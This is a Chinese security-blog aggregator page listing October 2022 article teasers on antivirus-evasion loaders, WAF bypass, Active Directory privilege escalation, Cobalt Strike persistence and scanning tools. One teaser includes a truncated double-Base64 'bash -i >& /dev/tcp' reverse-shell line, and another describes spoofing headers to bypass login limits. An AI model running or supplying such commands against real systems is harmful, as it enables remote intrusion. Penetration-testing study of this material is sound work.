免杀神器-- shellcode_loader 一、工具简介一款shellcode免杀工具，免杀测试对象火绒 360 联想等其他杀软,源码暂时就不放出来了效果如图。里面加了反沙箱的代码，所以在虚拟机运行会有问题。二、使用方法1、msf生成paylo... 2022-10-14 08:10:36 | 阅读: 20 | 收藏 | 系统安全运维 漏洞 利器 loader payload 免杀

从SQL注入绕过最新安全狗WAF中学习fuzz 其实SQL注入并不是很精通，通过实战绕过WAF来进行加强SQL注入能力，希望对正在学习的师傅能有一丝帮助。安装前言我是本地搭建的环境进行测试的环境是windows11+phpstudy2018+sql... 2022-10-13 08:9:19 | 阅读: 29 | 收藏 | 系统安全运维 绕过 安全 内联 phpstudy payload

Terraform 使用入门以及在云上攻防中的作用 文章首发于：火线Zone社区（https://zone.huoxian.cn/）0x00 前言Terraform 是一种资源编排工具，通过它可以很方便的去构建云服务资源，本文将以「在腾讯云上创建一个... 2022-10-13 08:9:16 | 阅读: 31 | 收藏 | 系统安全运维 cos 信息 腾讯 cloud

干货｜网络安全知识情报库 为解决大多粉丝的提问，以及资源需求，特此联合几位师傅创办了知识星球；知识星球已经运营一年多，内容大致为：（1）每日分享资料与工具，并进行了分类（2）创办了作业模块，偶尔发布作业与大佬互动，（3）成员可... 2022-10-13 08:9:13 | 阅读: 14 | 收藏 | 系统安全运维 给与 星主 创办 模块 合伙

什么是网络虚拟化、VLAN、VXLAN？ 网络虚拟化网络虚拟化是指虚拟网络节点之间的连接并不使用物理线缆连接，而是依靠特定的虚拟化链路相连其主要是对网络资源（端口、宽带、IP地址）进行抽象支持按照租户和应用进行动态分配和管理网络虚拟化技术网络... 2022-10-12 08:10:35 | 阅读: 9 | 收藏 | 系统安全运维 网络 虚拟 vxlan 虚拟化 vlan

利用CVE-2021-42278和CVE-2021-42287从标准域用户模拟 DA 利用 CVE-2021-42278 和 CVE-2021-42287 从标准域用户模拟 DA，该项目修改自 sam-the-admin。项目地址：https://github.com/Ridter/n... 2022-10-12 08:10:31 | 阅读: 20 | 收藏 | 系统安全运维 impersonate cgdomain wsx 1qaz sanfeng

神兵利器｜自动化网络扫描 -- reNgine 一、工具介绍是一个 Web 应用程序侦察套件，专注于通过引擎、侦察数据关联、持续监控、数据库支持的侦察数据和简单而直观的用户界面的高度可配置的流线型侦察过程。 二、安装与使用1、下载项目到本地git... 2022-10-12 08:10:27 | 阅读: 31 | 收藏 | 系统安全运维 利器 漏洞 数据 rengine github

干货分享 | 文件上传的一个骚操作(低权限+bypassAV) 0x01 前言各位在渗透中是否遇见过这个问题：虽然有低权限命令shell，如mssql、postgres等，执行下载总是各种无权限或者被AV杀，轻则无法继续渗透，重则弹出拦截消息，管理员上机后立马发现... 2022-10-11 08:9:8 | 阅读: 10 | 收藏 | 系统安全运维 certutil 拦截 artifact 渗透 数据

绕过登录次数限制的技巧【文末新书赠送】 1.自定义请求方法如果请求GET 尝试将其更改为POST、PUT 等，如果你想绕过 API 的请求限制，尝试HEAD方法。2.向请求头添加欺骗IPX-Forwarded: 127.0.0.1X-For... 2022-10-11 08:9:5 | 阅读: 12 | 收藏 | 系统安全运维 1x 安全 绕过 github 漏洞

神器｜指纹识别工具 -- Glass(镜) V2.0 一、工具简介Glass是一款针对资产列表的快速指纹识别工具，通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹，也可针对IP/IP段或资产列表进行快... 2022-10-10 08:10:9 | 阅读: 79 | 收藏 | 系统安全运维 glass python3 漏洞 利器 github

怎么理解CPU负载与CPU使用率 1、简介存储、内存和 CPU（中央处理器）等系统资源不足会极大地影响应用程序的性能。因此，监控这些组件至关重要。与磁盘和内存不同，监控 Linux 系统上的 CPU 使用率并不那么简单。在本文中，我们... 2022-10-9 08:10:47 | 阅读: 12 | 收藏 | 系统安全运维 使用率 vmstat 百分比 1347080 虚拟

某真实渗透实践案例分析 一、网络渗透测试概述网络渗透测试完全模拟黑客可能使用的攻击技术和漏洞发现技术，对目标系统的安全做深入的探测，发现网络脆弱环节，能直观的让网络管理员知道自己网络所面临的问题。所以渗透测试是安全评估的方法... 2022-10-9 08:10:44 | 阅读: 23 | 收藏 | 系统安全运维 信息 网络 渗透 database 数据库

端口扫描工具 -- Naabu 一、工具介绍Naabu 是一款比较新的扫描器，是由一家开源软件公司开发，其专注于 web 应用程序安全和漏洞狩猎。Naabu 是用 GO 语言编写，毕竟 Go 工具往往拥有运行速度快和出色的稳定性。该... 2022-10-9 08:10:41 | 阅读: 16 | 收藏 | 系统安全运维 端口 naabu nmap 漏洞 利器

图解kubernetes网络通信原理 来源：https://zhuanlan.zhihu.com/p/81667781名词解释1、网络的命名空间：Linux在网络栈中引入网络命名空间，将独立的网络协议栈隔离到不同的命令空间中，彼此间无法通... 2022-10-8 08:9:22 | 阅读: 13 | 收藏 | 系统安全运维 网络 集群 容器 kubernetes 端口

绕过 Linux Shell 限制 常见现实绕过Reverse Shell# Double-Base64 是避免像+之类符号的方法。90%的情况下是有效的echo "echo $(echo 'bash -i >& /dev/tcp/10... 2022-10-8 08:9:18 | 阅读: 16 | 收藏 | 系统安全运维 x2f passwd whoami lol

GoBypass - Golang免杀生成工具 Golang免杀生成工具，参考网上已有的免杀方式实现的半自动免杀马生成工具，需要本地安装Golang环境，支持多种参数与方式生成。项目地址：https://github.com/4ra1n/GoByp... 2022-10-8 08:9:15 | 阅读: 32 | 收藏 | 系统安全运维 免杀 github 信息 利器

8 个常用的 Wireshark 使用技巧 一：数据包过滤过滤需要的IP地址 ip.addr==在数据包过滤的基础上过滤协议ip.addr==xxx.xxx.xxx.xxx and tcp过滤端口ip.addr==xxx.xxx.xxx.xxx... 2022-10-6 20:24:47 | 阅读: 10 | 收藏 | 系统安全运维 数据 漏洞 干扰源 利器 信息

爆破工具验证码识别 -- xp_CAPTCHA(瞎跑-白嫖版) 一、工具介绍xp_CAPTCHA (白嫖版)，是一款验证码识别工具，是BurpSuite的一款插件，支持验证码返回包为json格式。二、安装与使用(需要python3 小于3.7的版本)1、安装 mu... 2022-10-6 20:24:36 | 阅读: 85 | 收藏 | 系统安全运维 captcha 漏洞 利器 python3 神兵

9个酷炫CMD命令 ~ 无线系统信息摘要(时间: 2020/7/16 13:02:50 中国标准时间)=============================================================... 2022-10-5 15:2:40 | 阅读: 14 | 收藏 | 系统安全运维 网络 无线 无线电 ssid

EasyPersistent - CobaltStrike权限维持插件 EasyPersistent是一个用于windows系统上权限维持的Cobalt Strike CNA 脚本。脚本整合了一些常用的权限维持方法，使用反射DLL模块可使用API对系统服务、计划任务等常见... 2022-10-5 15:2:37 | 阅读: 28 | 收藏 | 系统安全运维 windows 脚本 github 信息